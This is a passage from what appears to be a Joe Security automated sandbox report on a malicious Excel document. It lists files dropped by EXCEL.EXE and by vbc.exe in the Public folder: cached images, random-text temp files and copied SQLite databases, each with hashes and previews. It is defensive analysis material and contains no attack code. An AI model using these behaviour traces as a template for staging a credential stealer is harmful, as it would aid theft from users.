Preview: .PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%[email protected]..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`[email protected];...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}[email protected]./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
Category: dropped
Size (bytes): 4396
Entropy (8bit): 7.884233298494423
Encrypted: false
SSDEEP: 96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
MD5: 22FEC44258BA0E3A910FC2A009CEE2AB
SHA1: BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
SHA-256: 5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
SHA-512: 8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
Malicious: false
Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&[email protected].*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 11303
Entropy (8bit): 7.909402464702408
Encrypted: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBC9D9B.png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E382C2E0.jpeg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0748BEE.png
Copyright Joe Security LLC 2022 Page 20 of 65
SSDEEP: 192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5: 9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1: E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256: 88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512: 81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious: false
Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,[email protected].:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`[email protected]../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 2647
Entropy (8bit): 7.8900124483490135
Encrypted: false
SSDEEP: 48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
MD5: E46357D82EBC866EEBDA98FA8F94B385
SHA1: 76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
SHA-256: B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
SHA-512: 8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
Malicious: false
Preview: .PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%[email protected]..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`[email protected];...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}[email protected]./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
Process: C:\Users\Public\vbc.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.70435191336402
Encrypted: false
SSDEEP: 24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5: 8C1F71001ABC7FCE68B3F15299553CE7
SHA1: 382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256: DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512: 8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious: false
Preview: NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE
Process: C:\Users\Public\vbc.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.690067217069288
Encrypted: false
SSDEEP: 12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EE9.png
C:\Users\user\AppData\Local\Temp\tmp3E26.tmp
C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp
Copyright Joe Security LLC 2022 Page 21 of 65
MD5: 4E32787C3D6F915D3CB360878174E142
SHA1: 57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256: 2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512: CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious: false
Preview: AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ
Process: C:\Users\Public\vbc.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.70435191336402
Encrypted: false
SSDEEP: 24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5: 8C1F71001ABC7FCE68B3F15299553CE7
SHA1: 382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256: DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512: 8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious: false
Preview: NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE
Process: C:\Users\Public\vbc.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.690067217069288
Encrypted: false
SSDEEP: 12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5: 4E32787C3D6F915D3CB360878174E142
SHA1: 57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256: 2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512: CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious: false
Preview: AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ
C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp
C:\Users\user\AppData\Local\Temp\tmp533A.tmp
C:\Users\user\AppData\Local\Temp\tmp6222.tmp
Copyright Joe Security LLC 2022 Page 22 of 65
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
C:\Users\user\AppData\Local\Temp\tmp62EE.tmp
C:\Users\user\AppData\Local\Temp\tmp6417.tmp
C:\Users\user\AppData\Local\Temp\tmp64E3.tmp
Copyright Joe Security LLC 2022 Page 23 of 65
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 28672
Entropy (8bit): 0.9650411582864293
Encrypted: false
SSDEEP: 48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5: 903C35B27A5774A639A90D5332EEF8E0
SHA1: 5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256: 1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512: 076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp66A8.tmp
C:\Users\user\AppData\Local\Temp\tmp67A3.tmp
C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp
Copyright Joe Security LLC 2022 Page 24 of 65
Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 28672
Entropy (8bit): 0.9650411582864293
Encrypted: false
SSDEEP: 48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5: 903C35B27A5774A639A90D5332EEF8E0
SHA1: 5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256: 1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512: 076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: false
Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp6C85.tmp
C:\Users\user\AppData\Local\Temp\tmp7108.tmp
C:\Users\user\AppData\Local\Temp\tmp71C5.tmp
C:\Users\user\AppData\Local\Temp\tmp72BF.tmp
Copyright Joe Security LLC 2022 Page 25 of 65
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
